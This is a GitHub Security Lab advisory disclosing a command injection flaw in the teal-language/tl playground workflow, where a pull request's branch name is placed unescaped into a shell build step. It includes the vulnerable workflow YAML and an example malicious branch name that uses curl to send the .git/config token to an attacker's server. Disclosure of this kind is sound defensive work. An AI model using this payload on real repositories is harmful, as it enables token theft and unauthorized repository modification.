skip to content
Back to
Home Research Advisories CodeQL Wall of Fame Get Involved Events
February 3, 2021

GHSL-2021-017: Command injection in teal-language/tl workflow

Jaroslav Lobačevski

Coordinated Disclosure Timeline


The playground GitHub workflow is vulnerable to unauthorized modification of the base repository or secrets exfiltration from a Pull Request.


teal-language/tl repository

Tested Version

The latest changeset of playground.yml to the date.


Issue: A branch name from the pull request is used to format a shell command

    branches: [ master ]
    - name: build
      run: |
        echo "${{ github.event.pull_request.head.repo.full_name }}/${{ github.head_ref }}"
        cd ${{ github.workspace }}/teal-playground
        yarn build


This vulnerability allows for arbitrary command injection into the bash script which allows for unauthorized modification of the base repository and secrets exfiltration. For example a PR from branch named a";${IFS}curl${IFS}-d${IFS}@.git/config${IFS}${IFS}# would exfiltrate the repository token to the attacker controlled server.


This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).


You can contact the GHSL team at, please include a reference to GHSL-2021-017 in any communication regarding this issue.